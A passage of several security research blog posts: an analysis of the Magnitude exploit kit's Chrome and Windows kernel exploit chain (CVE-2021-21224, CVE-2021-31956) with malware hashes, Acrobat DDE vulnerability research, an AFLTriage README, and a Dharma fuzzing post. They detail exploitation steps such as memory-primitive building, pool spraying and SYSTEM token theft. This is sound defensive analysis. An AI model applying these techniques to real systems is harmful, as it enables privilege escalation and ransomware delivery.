The second element of point_array overlaps with the elements pointer and Array.length of fake. The exploit uses this for both arbitrary read and arbitrary write, first corrupting the elements pointer to point to the desired address and then reading/writing to that address through fake[0]. However, as can be seen in the exploit code above, there are some additional actions taken that are worth explaining. First of all, the exploit always makes sure that addrvar is an odd number. This is because V8 expects pointers to be tagged, with the least significant bit set. Then, there is the addition of 2<<32 to addrvar. As was explained before, the second element of point_array takes up 64 bits in memory, while the elements pointer and Array.length both take up only 32 bits. This means that a write to point_array[1] overwrites both members at once and the 2<<32 just simply sets the Array.length, which is controlled by the most significant 32 bits. Finally, there is the subtraction of 8 from addrvar. This is because the elements pointer does not point straight to the first element, but instead to a FixedDoubleArray structure, which takes up eight bytes and precedes the actual element data in memory.

A dummy WebAssembly program that will get hollowed out and replaced by Magnitude’s shellcode

The final step taken by the exploit is converting the arbitrary read/write primitive into arbitrary code execution. For this, it uses a well-known trick that takes advantage of WebAssembly. When V8 JIT-compiles a WebAssembly function, it places the compiled code into memory pages that are both writable and executable (there now seem to be some new mitigations that aim to prevent this trick, but it is still working against V8 versions vulnerable to CVE-2021-21224). The exploit can therefore locate the code of a JIT-compiled WebAssembly function, overwrite it with its own shellcode and then call the original WebAssembly function from Javascript, which executes the shellcode planted there.

Magnitude’s exploit first creates a dummy WebAssembly module that contains a single function called main, which just returns the number 42 (the original code of this function doesn’t really matter because it will get overwritten with the shellcode anyway). Using a combination of addrof and arb_read, the exploit obtains the address where V8 JIT-compiled the function main. Interestingly, it then constructs a whole new arbitrary write primitive using an ArrayBuffer with a corrupted backing store pointer and uses this newly constructed primitive to write shellcode to the address of main. While it could theoretically use the first arbitrary write primitive to place the shellcode there, it chooses this second method, most likely because it is more reliable. It seems that the first method might crash V8 under some rare circumstances, which makes it not practical for repeated use, such as when it gets called thousands of times to write a large shellcode buffer into memory.

There are two shellcodes embedded in the exploit. The first one contains an exploit for CVE-2021-31956. This one gets executed first and its goal is to steal the SYSTEM token to elevate the privileges of the current process. After the first shellcode returns, the second shellcode gets planted inside the JIT-compiled WebAssembly function and executed. This second shellcode injects Magniber ransomware into some already running process and lets it encrypt the victim’s drives.

CVE-2021-31956

Let’s now turn our attention to the second exploit in the chain, which Magnitude uses to escape the Chromium sandbox. This is an exploit for CVE-2021-31956, a paged pool buffer overflow in the Windows kernel. It was discovered in June 2021 by Boris Larin from Kaspersky, who found it being used as a zero-day in the wild as a part of the PuzzleMaker attack. The Kaspersky blog post about PuzzleMaker briefly describes the vulnerability and the way the attackers chose to exploit it. However, much more information about the vulnerability can be found in a twopart blog series by Alex Plaskett from NCC Group. This blog series goes into great detail and pretty much provides a step-by-step guide on how to exploit the vulnerability. We found that the attackers behind Magnitude followed this guide very closely, even though there are certainly many other approaches that they could have chosen for exploitation. This shows yet again that publishing vulnerability research can be a double-edged sword. While the blog series certainly helped many defend against the vulnerability, it also made it much easier for the attackers to weaponize it.

The vulnerability lies in ntfs.sys, inside the function NtfsQueryEaUserEaList, which is directly reachable from the syscall NtQueryEaFile. This syscall internally allocates a temporary buffer on the paged pool (the size of which is controllable by a syscall parameter) and places there the NTFS Extended Attributes associated with a given file. Individual Extended Attributes are separated by a padding of up to four bytes. By making the padding start directly at the end of the allocated pool chunk, it is possible to trigger an integer underflow which results in NtfsQueryEaUserEaList writing subsequent Extended Attributes past the end of the pool chunk. The idea behind the exploit is to spray the pool so that chunks containing certain Windows Notification Facility (WNF) structures can be corrupted by the overflow. Using some WNF magic that will be explained later, the exploit gains an arbitrary read/write primitive, which it uses to steal the SYSTEM token.

The exploit starts by checking the victim’s Windows build number. Only builds 18362, 18363, 19041, and 19042 (19H1 – 20H2) are supported, and the exploit bails out if it finds itself running on a different build. The build number is then used to determine proper offsets into the _EPROCESS structure as well as to determine correct syscall numbers, because syscalls are invoked directly by the exploit, bypassing the usual syscall stubs in ntdll.

Check for the victim’s Windows build number

Next, the exploit brute-forces file handles, until it finds one on which it can use the NtSetEAFile syscall to set its NTFS Extended Attributes. Two attributes are set on this file, crafted to trigger an overflow of 0x10 bytes into the next pool chunk later when NtQueryEaFile gets called.

Specially crafted NTFS Extended Attributes, designed to cause a paged pool buffer overflow

When the specially crafted NTFS Extended Attributes are set, the exploit proceeds to spray the paged pool with _WNF_NAME_INSTANCE and _WNF_STATE_DATA structures. These structures are sprayed using the syscalls NtCreateWnfStateName and NtUpdateWnfStateData, respectively. The exploit then creates 10 000 extra _WNF_STATE_DATA structures in a row and frees each other one using NtDeleteWnfStateData. This creates holes between _WNF_STATE_DATA chunks, which are likely to get reclaimed on future pool allocations of similar size. 

With this in mind, the exploit now triggers the vulnerability using NtQueryEaFile, with a high likelihood of getting a pool chunk preceding a random _WNF_STATE_DATA chunk and thus overflowing into that chunk. If that really happens, the _WNF_STATE_DATA structure will get corrupted as shown below. However, the exploit doesn’t know which _WNF_STATE_DATA structure got corrupted, if any. To find the corrupted structure, it has to iterate over all of them and query its ChangeStamp using NtQueryWnfStateData. If the ChangeStamp contains the magic number 0xcafe, the exploit found the corrupted chunk. In case the overflow does not hit any _WNF_STATE_DATA chunk, the exploit just simply tries triggering the vulnerability again, up to 32 times. Note that in case the overflow didn’t hit a _WNF_STATE_DATA chunk, it might have corrupted a random chunk in the paged pool, which could result in a BSoD. However, during our testing of the exploit, we didn’t get any BSoDs during normal exploitation, which suggests that the pool spraying technique used by the attackers is relatively robust.

The corrupted _WNF_STATE_DATA instance. AllocatedSize and DataSize were both artificially increased, while ChangeStamp got set to an easily recognizable value.

After a successful _WNF_STATE_DATA corruption, more _WNF_NAME_INSTANCE structures get sprayed on the pool, with the idea that they will reclaim the other chunks freed by NtDeleteWnfStateData. By doing this, the attackers are trying to position a _WNF_NAME_INSTANCE chunk after the corrupted _WNF_STATE_DATA chunk in memory. To explain why they would want this, let’s first discuss what they achieved by corrupting the _WNF_STATE_DATA chunk.

The _WNF_STATE_DATA structure can be thought of as a header preceding an actual WnfStateData buffer in memory. The WnfStateData buffer can be read using the syscall NtQueryWnfStateData and written to using NtUpdateWnfStateData. _WNF_STATE_DATA.AllocatedSize determines how many bytes can be written to WnfStateData and _WNF_STATE_DATA.DataSize determines how many bytes can be read. By corrupting these two fields and setting them to a high value, the exploit gains a relative memory read/write primitive, obtaining the ability to read/write memory even after the original WnfStateData buffer. Now it should be clear why the attackers would want a _WNF_NAME_INSTANCE chunk after a corrupted _WNF_STATE_DATA chunk: they can use the overread/overwrite to have full control over a _WNF_NAME_INSTANCE structure. They just need to perform an overread and scan the overread memory for bytes 03 09 A8, which denote the start of their _WNF_NAME_INSTANCE structure. If they want to change something in this structure, they can just modify some of the overread bytes and overwrite them back using NtUpdateWnfStateData.

The exploit scans the overread memory, looking for a _WNF_NAME_INSTANCE header. 0x0903 here represents the NodeTypeCode, while 0xA8 is a preselected NodeByteSize.

What is so interesting about a _WNF_NAME_INSTANCE structure, that the attackers want to have full control over it? Well, first of all, at offset 0x98 there is _WNF_NAME_INSTANCE.CreatorProcess, which gives them a pointer to _EPROCESS relevant to the current process. Kaspersky reported that PuzzleMaker used a separate information disclosure vulnerability, CVE-2021-31955, to leak the _EPROCESS base address. However, the attackers behind Magnitude do not need to use a second vulnerability, because the _EPROCESS address is just there for the taking.

Another important offset is 0x58, which corresponds to _WNF_NAME_INSTANCE.StateData. As the name suggests, this is a pointer to a _WNF_STATE_DATA structure. By modifying this, the attackers can not only enlarge the WnfStateData buffer but also redirect it to an arbitrary address, which gives them an arbitrary read/write primitive. There are some constraints though, such as that the StateData pointer has to point 0x10 bytes before the address that is to be read/written and that there has to be some data there that makes sense when interpreted as a _WNF_STATE_DATA structure.

The StateData pointer gets first set to _EPROCESS+0x28, which allows the exploit to read _KPROCESS.ThreadListHead (interestingly, this value gets leaked using ChangeStamp and DataSize, not through WnfStateData). The ThreadListHead points to _KTHREAD.ThreadListEntry of the first thread, which is the current thread in the context of Chromium exploitation. By subtracting the offset of ThreadListEntry, the exploit gets the _KTHREAD base address for the current thread. 

With the base address of _KTHREAD, the exploit points StateData to _KTHREAD+0x220, which allows it to read/write up to three bytes starting from _KTHREAD+0x230. It uses this to set the byte at _KTHREAD+0x232 to zero. On the targeted Windows builds, the offset 0x232 corresponds to _KTHREAD.PreviousMode. Setting its value to SystemMode=0 tricks the kernel into believing that some of the thread’s syscalls are actually originating from the kernel. Specifically, this allows the thread to use the NtReadVirtualMemory and NtWriteVirtualMemory syscalls to perform reads and writes to the kernel address space.

The exploit corrupting _KTHREAD.PreviousMode

As was the case in the Chromium exploit, the attackers here just traded an arbitrary read/write primitive for yet another arbitrary read/write primitive. However, note that the new primitive based on PreviousMode is a significant upgrade compared to the original StateData one. Most importantly, the new primitive is free of the constraints associated with the original one. The new primitive is also more reliable because there are no longer race conditions that could potentially cause a BSoD. Not to mention that just simply calling NtWriteVirtualMemory is much faster and much less awkward than abusing multiple WNF-related syscalls to achieve the same result.

With a robust arbitrary read/write primitive in place, the exploit can finally do its thing and proceed to steal the SYSTEM token. Using the leaked _EPROCESS address from before, it finds _EPROCESS.ActiveProcessLinks, which leads to a linked list of other _EPROCESS structures. It iterates over this list until it finds the System process. Then it reads System’s _EPROCESS.Token and assigns this value (with some of the RefCnt bits masked out) to its own _EPROCESS structure. Finally, the exploit also turns off some mitigation flags in _EPROCESS.MitigationFlags.

Now, the exploit has successfully elevated privileges and can pass control to the other shellcode, which was designed to load Magniber ransomware. But before it does that, the exploit performs many cleanup actions that are necessary to avoid blue screening later on. It iterates over WNF-related structures using TemporaryNamesList from _EPROCESS.WnfContext and fixes all the _WNF_NAME_INSTANCE structures that got overflown into at the beginning of the exploit. It also attempts to fix the _POOL_HEADER of the overflown _WNF_STATE_DATA chunks. Finally, the exploit gets rid of both read/write primitives by setting _KTHREAD.PreviousMode back to UserMode=1 and using one last NtUpdateWnfStateData syscall to restore the corrupted StateData pointer back to its original value.

Fixups performed on previously corrupted _WNF_NAME_INSTANCE structures

Final Thoughts

If this isn’t the first time you’re hearing about Magnitude, you might have noticed that it often exploits vulnerabilities that were previously weaponized by APT groups, who used them as zero-days in the wild. To name a few recent examples, CVE-2021-31956 was exploited by PuzzleMaker, CVE-2021-26411 was used in a high-profile attack targeting security researchers, CVE-2020-0986 was abused in Operation Powerfall, and CVE-2019-1367 was reported to be exploited in the wild by an undisclosed threat actor (who might be DarkHotel APT according to Qihoo 360). The fact that the attackers behind Magnitude are so successful in reproducing complex exploits with no public PoCs could lead to some suspicion that they have somehow obtained under-the-counter access to private zero-day exploit samples. After all, we don’t know much about the attackers, but we do know that they are skilled exploit developers, and perhaps Magnitude is not their only source of income. But before we jump to any conclusions, we should mention that there are other, more plausible explanations for why they should prioritize vulnerabilities that were once exploited as zero-days. First, APT groups usually know what they are doing[citation needed]. If an APT group decides that a vulnerability is worth exploiting in the wild, that generally means that the vulnerability is reliably weaponizable. In a way, the attackers behind Magnitude could abuse this to let the APT groups do the hard work of selecting high-quality vulnerabilities for them. Second, zero-days in the wild usually attract a lot of research attention, which means that there are often detailed writeups that analyze the vulnerability’s root cause and speculate about how it could get exploited. These writeups make exploit development a lot easier compared to more obscure vulnerabilities which attracted only a limited amount of research.

As we’ve shown in this blog post, both Magnitude and Underminer managed to successfully develop exploit chains for Chromium on Windows. However, none of the exploit chains were particularly successful in terms of the number of exploited victims. So what does this mean for the future of exploit kits? We believe that unless some new, hard-to-patch vulnerability comes up, exploit kits are not something that the average Google Chrome user should have to worry about much. After all, it has to be acknowledged that Google does a great job at patching and reducing the browser’s attack surface. Unfortunately, the same cannot be said for all other Chromium-based browsers. We found that a big portion of those that we protected from Underminer were running Chromium forks that were months (or even years) behind on patching. Because of this, we recommend avoiding Chromium forks that are slow in applying security patches from the upstream. Also note that some Chromium forks might have vulnerabilities in their own custom codebase. But as long as the number of users running the vulnerable forks is relatively low, exploit kit developers will probably not even bother with implementing exploits specific just for them.

Finally, we should also mention that it is not entirely impossible for exploit kits to attack using zero-day or n-day exploits. If that were to happen, the attackers would probably carry out a massive burst of malvertising or watering hole campaigns. In such a scenario, even regular Google Chrome users would be at risk. The damage done by such an attack could be enormous, depending on the reaction time of browser developers, ad networks, security companies, LEAs, and other concerned parties. There are basically three ways that the attackers could get their hands on a zero-day exploit: they could either buy it, discover it themselves, or discover it being used by some other threat actor. Fortunately, using some simple math we can see that the campaign would have to be very successful if the attackers wanted to recover the cost of the zero-day, which is likely to discourage most of them. Regarding n-day exploitation, it all boils down to a race if the attackers can develop a working exploit sooner than a patch gets written and rolled out to the end users. It’s a hard race to win for the attackers, but it has been won before. We know of at least two cases when an n-day exploit working against the latest Google Chrome version was dumped on GitHub (this probably doesn’t need to be written down, but dumping such exploits on GitHub is not a very bright idea). Fortunately, these were just renderer exploits and there were no accompanying sandbox escape exploits (which would be needed for full weaponization). But if it is possible to win the race for one exploit, it’s not unthinkable that an attacker could win it for two exploits at the same time.

Indicators of Compromise (IoCs)

Magnitude
SHA-256 Note
71179e5677cbdfd8ab85507f90d403afb747fba0e2188b15bd70aac3144ae61a CVE-2021-21224 exploit
a7135b92fc8072d0ad9a4d36e81a6b6b78f1528558ef0b19cb51502b50cffe6d CVE-2021-21224 exploit
6c7ae2c24eaeed1cac0a35101498d87c914c262f2e0c2cd9350237929d3e1191 CVE-2021-31956 exploit
8c52d4a8f76e1604911cff7f6618ffaba330324490156a464a8ceaf9b590b40a payload injector
8ff658257649703ee3226c1748bbe9a2d5ab19f9ea640c52fc7d801744299676 payload injector
Underminer
SHA-256 Note
2ac255e1e7a93e6709de3bbefbc4e7955af44dbc6f977b60618237282b1fb970 CVE-2021-21224 exploit
9552e0819f24deeea876ba3e7d5eff2d215ce0d3e1f043095a6b1db70327a3d2 HiddenBee loader
7a3ba9b9905f3e59e99b107e329980ea1c562a5522f5c8f362340473ebf2ac6d HiddenBee module container
2595f4607fad7be0a36cb328345a18f344be0c89ab2f98d1828d4154d68365f8 amd64/coredll.bin
ed7e6318efa905f71614987942a94df56fd0e17c63d035738daf97895e8182ab amd64/pcs.bin
c2c51aa8317286c79c4d012952015c382420e4d9049914c367d6e72d81185494 CVE-2019-0808 exploit
d88371c41fc25c723b4706719090f5c8b93aad30f762f62f2afcd09dd3089169 CVE-2020-1020 exploit
b201fd9a3622aff0b0d64e829c9d838b5f150a9b20a600e087602b5cdb11e7d3 CVE-2020-1054 exploit

The post Exploit Kits vs. Google Chrome appeared first on Avast Threat Labs.

Exploring Acrobat’s DDE attack surface

Introduction

 

Adobe Acrobat have been our favorite target to poke at for bugs lately, knowing that it's one of the most popular and most versatile PDF readers available. In our previous research, we've been hammering Adobe Acrobat's JavaScript APIs by writing dharma grammars and testing them against Acrobat. As we continue investigating those APIs, we decided as a change of scenery to look into other features Adobe Acrobat has provided. Even though it has a rich attack surface yet we had to find which parts would be a good place to start looking for bugs.

While looking at the broker functions, we noticed that there’s a function that’s accessible through the renderer that triggers DDE calls. That by itself was a reason for us to start looking into the DDE component of Acrobat.

In this blog we'll dive into some of Adobe Acrobat attack surface starting with DDE within adobe using Adobe IAC.


DDE in Acrobat

To understand how DDE works let's first introduce the concept of inter-process communication (IPC).

So, what is IPC? It's a mechanism for processes to communicate with each other provided by the operating system. It could be that one process informs another about an event that has occurred, or it could be managing shared data between processes. In order for these processes to understand each other they have to agree on certain communication approach/protocol. There are several IPC mechanisms supported by windows such as: mailslots, pipes, DDE ... etc.

In Adobe Acrobat DDE is supported through Acrobat IAC which we will discuss later in this blog.


What is DDE?

In short DDE stands for Dynamic Data exchange which is a message-based protocol that is used for sending messages and transferring data between one process to another using shared memory.

In each inter-process communication with DDE, a client and a server engage in a conversation.

A DDE conversation is established using uniquely defined strings as follows:

  • Service name: a unique string defined by the application that implements the DDE server which will be used by both DDE Client and DDE server to initialize the communication.

  • Topic name: is a string that identifies a logical data context.

  • Item name: is a string that identifies a unit of data a server can pass to a client during a transaction.

 

DDE shares these strings by using it's Global Atom Table. For more details about Atoms. Also, DDE protocol defines how applications should use the wPram and lParam parameters to pass larger data pieces through shared memory handles and global atoms.


When is DDE used?

 

It is most appropriate for data exchanges that do not require ongoing user interaction. An application using DDE provides a way for the user to exchange data between the two applications. However, once the transfer is established, the applications continue to exchange data without further user intervention as in socket communication.

The ability to use DDE in an application running on windows can be added through DDMEL.


Introducing DDEML

The Dynamic Data Exchange Management Library DDEML by windows makes it easier to add DDE support to an application by providing an interface to simplify managing DDE conversations. Meaning that instead of sending, posting, and processing DDE messages directly, an application can use the DDEML functions to manage DDE conversations.

So, usually the following steps will happen when a DDE client wants to start conversation with the Server:

 

  1. Initialization

Before calling a DDE functionwe need to register our application with DDEML and specify the transaction filter flags for the callback function, the following functions used for the initialization part:

  •  DdeInitializeW()

  • DdeInitializeA()

 

    Note: "A" used to indicate "ANSI" A Unicode version with the letter "W" used to indicate "wide"

   

2. Establishing a Connection

In order to connect our client to a DDE Server we must use the Service and Topic names associated with the application. The following function will return a handle to our connection which will be used later for data transactions and connection termination:

  • DdeConnect()

 

3. Data Transaction

In order to send data from DDE client to DDE server we need to call the following function:

  • DdeClientTransaction()


4. Connection Termination

DDEML provides a function for terminating any DDE conversations and freeing any DDEML resources related:

  • DdeUninitialize()

Acrobat IAC

As we discussed before about Acrobat, Inter Application Communication (IAC) allows an external application to control and manipulate a PDF file inside Adobe Acrobat using several methods such as OLE and DDE.

For example, let's say you want to merge two PDF documents into one and save that document with a different name, what do we need to achieve that ?

  1. Obviously we need adobe acrobat DC pro .

  2. The service, topic names for acrobat.

    • Topic name is "Control"

    • Service Name:

      • AcroViewA21" here "A" means Acrobat and "21" refer to the version.

      • "AcroViewR21" here "R" for Reader.


    So, to retrieve the service name for your installation based on the product and the version you can check the registry key:

What is the item we are going to use ?

When we attempt to send a DDE command to the server implemented in acrobat the item will be NULL.

Acrobat Adobe Reader DC supports several DDE messages, but some of these messages require Adobe Acrobat Adobe DC Pro version in order to work.

The format of the message should be between brackets and it's case sensitive. e.g:

  • Displaying document: such as "[FileOpen()]" and "[DocOpen()]".

  • Saving and printing documents: such as "[DocSave()]" and "[DocPrint()]".

  • Searching document: such as "[DocFind()]".

  • Manipulating document such as: "[DocInsertPage()]" and "[DocDeletePages()]".


    Note: that in order to use Acrobat Adobe DDE messages that start with Doc, the file must be opened using [DocOpen()] message.

We started by defining Service and topic names for Adobe Acrobat and the DDE messages we want to send. In our case, we want to merge two Documents into one so we need three DDE methods "[DocOpen()]" , "[DocInsertPages()]" and "[DocSaveAs()]":


 Next, as we discussed before, we first need to register our application to DDEML using DdeInitialize():

After the initialization step we have to connect to the DDE server using Service and Topic that we defined earlier:

Now we need to send our message using DdeClientTransaction() and as we can see we used XTYPE_EXECUTE with NULL Item, and our command is stored in HDDEDATA handle by calling DdeCreateDataHandle(). After executing this part of code, Adobe Acrobat will open the PDF document and append the other document to it, and save it as new file then exit Adobe Acrobat:

The last part is closing the connection and cleaning the opened handles:

So we decided to take a look at adobe plugins to see who else is implementing DDE Server by searching for DdeInitilaize() call:

Great 😈 it seems we got five plugins that implement a DDE service, before we analyzing these plugins we went to search for more info about them and we found that the search and catalog plug-ins are documented by Adobe... good what next!

 

Search Plug-in

We started to read about the search plug-in and we summarized it in the following:

Acrobat has a feature which allows the user to search for a text inside PDF document. But we already mentioned a DDE method called DocFind() right? well, DocFind() will search the PDF document page by page while the search plug-in will perform an indexed search that allows to search a word in the form of a query, so in other word we can search a cataloged PDF 🙂.

So basically the search plug-in allows the client to send search queries and manipulate indexes.

When implementing a client that communicates with the search plug-in the service name and topic's name will be "Acrobat Search" instead of "Acroview".

 

Remember when we send a DDE request to Adobe Acrobat, the item was NULL, but in search plugin there are two types of items the client can use to submit a query data and one item for manipulating the index:

 

  • SimpleQuery item: Allows the user to send a query that support Boolean operation e.g if we want to search for  any occurrence of word "bye" or "hello" we can send "bye OR hello".

  • Query item: this allow different search query and we can specify the parser handling the query.

 

While the item name used to manipulate indexes is "Index” , the DDE transaction type will be "XTYPE_POKE" which is a single poke transaction.

So, we started by manipulating indexes. When we attempt to do an operation on indexes the data must be in the following form:

Where eAction represents the action to be made on the index:

  • Adding index

  • Deleting index

  • Enabling or Disabling index on the shelf.

 

The cbData[0] will store the index file path we want to do an action on - example: “C:\\XD\\test.pdx” and PDX file is an index file that is create by one or multiple IDX files.


CVE-2021-39860

So, we started analyzing the function responsible for handling the structure data sent by the client, and turned out there are no check on what data sent.

As we can see after calling DdeAccessData(), the EAX register will storea  pointer to our data and we can see it access whatever data at offset 4 . So if we want to trigger an access violation at "movsx eax,word ptr [ecx+4]" simply send a two byte string which result in Out-Of-Bound Read 🙂 as demonstrated in the following crash:

 

Catalog Plug-in

Acrobat DC has a feature that allows the user to create a full-text index file for one or multiple PDF documents that will be searchable using the search command. The file extension is PDX. It will store the text of all specified PDF documents.

Catalog Plug-in support several DDE methods such as:

  • [FileOpen(full path)] : Used to open an index file and display the edit index dialog box, the file name must end with PDX extension.

  • [FilePurge(full path)]:  Used to purge index definition file. The file name also must end with PDX extension.

 

The Topic name for Catalog is "Control" and the service name according to adobe documentation is "Acrobat", however if we check the registry key belonging to adobe catalog we can see that is "Acrocat" (meoww) instead of "Acrobat".

Using IDApro we can see the DDE methods that catalog plugin support along with Service and Topic names:

 

CVE-2021-39861 

Since there are several DDE methods that we can send to the catalog plugin and these DDE methods accept one argument (except for "App related methods") which is a path to a file,  we started analyzing the function responsible for handling this argument and turned out 🙂:

 

The function will check the start of the string (supplied argument) for \xFE\xFF, if it's there then call Bug() function which will read the string as Unicode string, otherwise it will call sub_22007210() which will read the string as ANSI string.

So, if we can send "\xFE\xFF" or byte order mask at the start of ASCII string then probably we will end up with Out-of-bound Read since it will look for Unicode NULL terminator which is "\x00\x00" instead of ASCII NULL terminator.

We can see here the function handling Unicode string :

 

And 😎:

Here we can see a snippet of the POC:

 

That’s it for today. Stay tuned for more new attack surfaces blogs!

Happy Hunting!

References

AFLTriage - Tool To Triage Crashing Input Files Using A Debugger


AFLTriage is a tool to triage crashing input files using a debugger. It is designed to be portable and not require any run-time dependencies, besides libc and an external debugger. It supports triaging crashes generated by any program, not just AFL, but recognizes AFL directories specially, hence the name.

Some notable features include:

  • Multiple report formats: text, JSON, and raw debugger JSON
  • Parallel crash triage
  • Crash deduplication
  • Sanitizer report parsing
  • Supports binary targets with or without symbols/debugging information
  • Source code and variables will be annotated in reports for context

Currently AFLTriage only supports GDB and has only been tested on Linux C/C++ targets. Note that AFLTriage does not classify crashes by potential exploitablity. Accurate exploitability classification is very target and scenario specific and is best left to specialized tools and expert analysts.


Usage

Usage of AFLTriage is quite straightforward. You need your inputs to triage, an output directory for reports, and the binary and its arguments to triage.

Example:

$ afltriage -i fuzzing_directory -o reports ./target_binary --option-one @@
AFLTriage v1.0.0

[+] GDB is working (GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1 - Python 3.6.9 (default, Jan 26 2021, 15:33:00))
[+] Image triage cmdline: "./target_binary --option-one @@"
[+] Reports will be output to directory "reports"
[+] Triaging AFL directory fuzzing_directory/ (41 files)
[+] Triaging 41 testcases
[+] Using 24 threads to triage
[+] Triaging [41/41 00:00:02] [####################] CRASH: ASAN detected heap-buffer-overflow in buggy_function after a READ leading to SIGABRT (si_signo=6) / SI_TKILL (si_code=-6)
[+] Triage stats [Crashes: 25 (unique 12), No crash: 16, Errored: 0]

Similar to AFL the @@ is replaced with the path of the file to be triaged. AFLTriage will take care of the rest.

Building and Running

You will need a working Rust build environment. Once you have cargo and rust installed, building and running is simple:

cd afltriage-rs/
cargo run --help

<compilation>

Finished dev [unoptimized + debuginfo] target(s) in 0.33s
Running `target/debug/afltriage --help`

<AFLTriage usage>
...

Extended Usage

debugging output of triage operations. -h, --help Prints help information -V, --version Prints version information ARGS: <command>... The binary executable and args to execute. Use '@@' as a placeholder for the path to the input file or --stdin. Optionally use -- to delimit the start of the command. ">
afltriage 1.0.0
Quickly triage and summarize crashing testcases

USAGE:
afltriage -i <input>... -o <output> <command>...

OPTIONS:
-i <input>...
A list of paths to a testcase, directory of testcases, AFL directory, and/or directory of AFL directories to
be triaged. Note that this arg takes multiple inputs in a row (e.g. -i input1 input2...) so it cannot be the
last argument passed to AFLTriage -- this is reserved for the command.
-o <output>
The output directory for triage report files. Use '-' to print entire reports to console.

-t, --timeout <timeout>
The timeout in milliseconds for each testcase to triage. [default: 60000]

-j, --jobs <jobs>
How many threads to use during triage.

--report-formats <report_format s>...
The triage report output formats. Multiple values allowed: e.g. text,json. [default: text] [possible
values: text, json, rawjson]
--bucket-strategy <bucket_strategy>
The crash deduplication strategy to use. [default: afltriage] [possible values: none, afltriage,
first_frame, first_frame_raw, first_5_frames, function_names, first_function_name]
--child-output
Include child output in triage reports.

--child-output-lines <child_output_lines>
How many lines of program output from the target to include in reports. Use 0 to mean unlimited lines (not
recommended). [default: 25]
--stdin
Provide testcase input to the target via stdin instead of a file.

--profile-only
Perform environment chec ks, describe the inputs to be triaged, and profile the target binary.

--skip-profile
Skip target profiling before input processing.

--debug
Enable low-level debugging output of triage operations.

-h, --help
Prints help information

-V, --version
Prints version information


ARGS:
<command>...
The binary executable and args to execute. Use '@@' as a placeholder for the path to the input file or
--stdin. Optionally use -- to delimit the start of the command.

Related Projects



Introduction to Dharma - Part 2 - Making Dharma More User-Friendly using WebAssembly as a Case-Study

In the first part of our Dharma blogpost, we utilized Dharma to write grammar files to fuzz Adobe Acrobat JavaScript API's. Learning how to generate JavaScript code using Dharma opened a whole new area of research for us. In theory, we can target anything that uses JavaScript. According to the 2020 Stack Overflow Developer Survey, JavaScript sits comfortably in the #1 rank spot of being the most commonly used language in the world:

In this blogpost, we'll focus more on fuzzing WebAssembly API's in Chrome. To start with WebAssembly, we went and read the documentation provided by MDN.

We'll start by walking through the basics and getting familiarized with the idea of WebAssembly and how it works with browsers. WebAssembly helps to resolve many issues by using pre-compiled code that gets executed directly, running at near native speed.

After we had the basic idea of WebAssembly and its uses, we started building some simple applications (Hello World!, Calculator, ..), by doing that, we started to get more comfortable with WebAssembly's APIs, syntax and semantics.

Now we can start thinking about fuzzing WebAssembly.

If we break a WebAssembly Application down, we'll notice that its made of three components:

  1. Pure JavaScript Code.

  2. WebAssembly APIs.

  3. WebAssembly Module.

Since we're trying to fuzz everything under the sun, we'll start with the first two components and then tackle the third one later.


JavaScript & WebAssembly API

This part contains a lot of JavaScript code. We need to pay attention to the syntactical part of the language or we'll end up getting logical and syntax errors that are just a headache to deal with. The best way to minimize errors, and easily generate syntactically (and hopefully logically) correct JavaScript code is using a grammar-based text generation tool, such as Domato or Dharma.

To start, we went to MDN and pulled all the WebAssembly APIs. Then we built a Dharma logic for each API. While doing so, we faced a lot of issues that could slow down or ruin our fuzzer. That said, we'll go over these issues later on in this blog.

To instantiate a WebAssembly module, we have to use WebAssembly.instantiate function, which takes a module (pre-compiled WebAssembly module) and optionally a buffer, here's how it looks as a JavaScript code:

The process is simple, we will'll have to test-try the code, understand how it works and then build Dharma logics for it. The same process applies to all the APIs. As a result, the function above can be translated to the following in Dharma:

The output should be similar to the following:

What we're trying to achieve is covering all possible arguments for that given function.

On a side note: The complexity and length of the Dharma file dramatically increased ever since we started working on this project. Thus, we decided to give code snippets rather than the whole code for brevity.

Coding Style

We had to follow a certain coding style during our journey in writing Dharma files for WebAssembly for different reasons.

First, in order to differentiate our logic from Dharma logic - Dharma provides a common.dg file which you can find in the following path: dharma/grammars/common.dg . This file contains helpful logic, such as digit which will give you a number between 0-9, and short_int which will give you a number between 0-65535. This file is useful but generic and sometimes we need something more specific to our logic. That said, we ended up creating our own logic:

We also decided to go with different naming conventions, so we can utilize the auto-complete feature of our text editor. Dharma uses snake_case for naming, we decided to go with Camel Case naming instead.

Also, for our coding style, we decided to use some sort of prefix and postfix to annotate the logic. Let's take variables for example, we start any variable with var followed by class or function name:

This is will make it easy to use later and would make it easier to understand in general.

We applied the same concept for parameters as well. We start with the function's name followed by Param as a naming convention:

Since we're mentioning parameters, let's go over an example of an idea we mentioned earlier. If a function has one or more optional parameters, we create a section for it to cover all the possibilities:

Therefor our coding style, we used comments to divide the file into sections so we can group and reach a certain function easily:

That said, you can easily find certain functions or parameters under its related section. This is a fairly good solution to make the file more manageable. At a certain point you have to make a file for each section, and group shared logic on an abstract shared file so you eliminate the duplication - maybe we'll talk about this on another blog (maybe not xD).

Testing and validation

After we finish the first version of our Dharma logic file we ran it, and noticed a lot of JavaScript logical errors. Small mistakes that we make normally do, like forgetting a bracket or a comma etc.. To solve these error we created a builder section were we build our logic there:

We had to go through each line one by one to eliminate all the possible logical errors. We also created a wrapper function that wraps the code with try-catch blocks:

By doing so, we made it much easier to isolate and test the possible output.

While we were working on the Dharma logic file we faced another issue. When you want your JavaScript to import something from the .wasm(eg. a table or a memory buffer) you have to provide it from the .wasm module. For that, we ended up making many modules that provide whatever we import from generated JS logic, and export whatever we import from .wasm modules. In brief, to do that we built a lot of .wasm modules, each one exports or imports what JavaScript needs to test an API. An example of this logic:

For that to work, you need the following .wasm file:

So if JavaScript is looking for the main function you should have a main function inside your .wasm module. Also, as we mentioned, there are many things to check like import/export table, import/export buffer, functions, and global variables. We'll have to combine many of them together, but some of them we couldn't like tables. You can only have one on your program either exported or imported. That said, we had to separate them into different modules and avoid some of them to reduce complexity.

After finishing our first version, we went to the chromium bug tracker which appears to be a great place to expand our logic to find more smart, complex tips and tricks. We used some of the snippets there as it is, and some of them with little modification. Also it's worth mentioning that, when you search you should apply the filter that is related to your area of interest. In our case we looked into all bugs that have Type of 'Bug-Security' and the component is Blink>JavaScript>WebAssembly, you can use this line on the search bar.

While we were reading these issues on the bug tracker, we found this bug that could be produced by our Dharma logic (if we were a bit faster xD)

WebAssembly Module

Now that we're done fuzzing the first two components, we can move on to the last component of WebAssembly, which is the module.

